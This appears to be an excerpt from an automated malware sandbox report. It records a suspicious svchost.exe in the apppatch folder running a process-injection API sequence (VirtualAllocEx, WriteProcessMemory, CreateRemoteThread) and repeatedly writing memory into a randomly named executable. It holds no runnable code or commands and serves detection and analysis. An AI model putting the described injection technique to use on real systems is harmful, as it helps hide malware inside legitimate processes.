Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C93240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,2_2_02C93240
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 6_2_01263240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,6_2_01263240
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 7_2_01063240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,7_2_01063240
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 9_2_00A43240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,9_2_00A43240
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1070000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1071000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1072000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 10C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1470000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1471000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1472000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 14C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1220000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1221000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1222000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1272000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9B0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9B1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9B2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A02000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 600000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 601000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 602000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 652000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1032000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 940000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 941000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 942000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 992000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F70000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F71000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F72000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FC2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1570000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1571000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1572000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 15C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 10E0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 10E1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 10E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1132000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1220000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1221000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1222000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1272000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1250000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1251000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1252000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 12A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11B0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11B1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11B2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1202000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AC0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AC1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AC2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: B12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1400000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1401000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1402000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1452000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 14A0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 14A1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 14A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 14F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1020000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1021000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1022000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1072000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1190000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1191000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1192000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1550000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1551000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1552000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 15A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A20000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A21000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A22000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A72000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: CB0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: CB1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: CB2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: D02000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11A0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11A1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1340000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1341000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1342000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1392000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1580000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1581000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1582000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 15D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E10000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FD0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FD1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FD2000Jump to behavior
